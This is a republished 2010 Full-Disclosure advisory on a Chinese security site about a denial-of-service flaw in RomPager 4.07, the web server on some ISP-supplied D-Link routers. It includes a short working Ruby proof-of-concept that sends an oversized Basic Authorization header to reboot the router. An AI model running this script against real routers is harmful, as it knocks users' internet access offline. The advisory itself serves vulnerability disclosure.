首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RomPager 4.07 Denial Of Service
来源:http://secunia.com 作者:Secunia 发布时间:2010-12-09  
Software: "RomPager/4.07 UPnP/1.0"

Issue: A reboot can be caused when a special crafted http request is sent.

Other Details: This version of RomPager is seen on a number of
residential routers that are shipped by a number of different ISP's.
The router I personal know it effects is the d-link DSL-2640R shipped
by virgin media. I also do believe this effects the d-link DSL-2641R.

I have made www.allegrosoft.com aware of the issue ( the creators of
RomPager ) and they have stated that version is very old and out dated
and should no longer be used and they stated they have been un able to
replicate the issue. This would lead me to believe it has something to
do with the ISP's customer firmware, I have contacted virgin media to
make them aware of the issue ( this was over a month ago ) so I am now
making this public.

If other people have a home router running the RomPager 4.07 software
please try the ruby script provided bellow and see if your router
restarts as well then add the make and module of router along with the
location this was obtained.

This is a assumption however I do think this could be further
exploited by close investigation with jtag access to the device,
however at the moment I am guessing the routers software watch dog
kicks in and restarts the router

Ruby Script:

require 'net/https'

url = URI.parse("http://IP/")
data = nil
headers = {
	"Host" => "IP",
	"Authorization" => "Basic
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
res = Net::HTTP.start(url.host, url.port) do |http|
	http.use_ssl = false
	http.send_request("GET", url.path, data, headers)
end

puts res.body

Regards,
-- Mr R Birtles

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Freefloat FTP Server Buffer Ov
·Internet Explorer 8 CSS Parser
·Abtp Portal Project 0.1.0 LFI
·AJ Matrix DNA SQL INJECTION
·MODx Revolution CMS 2.0.4-pl2
·Create a New User with UID 0 -
·Winamp 5.6 Arbitrary Code Exec
·VMware Tools update OS Command
·GNU inetutils 1.8-1 FTP Client
·Apache Archiva 1.0 - 1.3.1 CSR
·Linux Kernel <= 2.6.37 Local P
·Freefloat FTP Server v1.00 Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved